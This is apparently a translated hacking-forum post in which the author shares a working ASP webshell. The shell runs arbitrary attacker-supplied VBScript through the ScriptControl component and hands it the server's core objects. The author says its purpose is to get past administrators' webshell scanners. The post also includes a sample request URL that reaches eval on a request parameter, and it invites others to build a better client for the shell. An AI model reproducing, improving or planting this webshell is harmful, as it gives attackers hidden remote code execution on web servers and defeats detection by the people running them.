I have always been curious, why is there either eval or execute in the client? No matter where I hide, the administrator can kick my ass using whatever XX webshell scanner. Today I re-researched the ScriptControl component in VB and found that it can also be called in asp. I studied the method and later discussed it with lcx. I got the following code. I would like to thank my seniors for their guidance, haha.
The code is very simple, so I won’t explain it too much to avoid anyone scolding me for pretending.
Copy the code code as follows:
<%
Set o = Server.CreateObject(ScriptControl)
o.language = vbscript
o.addcode(Request(SubCode)) 'Parameter SubCode as process code
o.run e,Server,Response,Request,Application,Session,Error 'Call it with parameter name e, and push 6 base objects as parameters at the same time
'Call example:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Note that although it can be used, the experiment found that only the lake2 client can be used. I hope someone can come out and make it more general. hehe. It would also be a good idea to write your own dedicated client.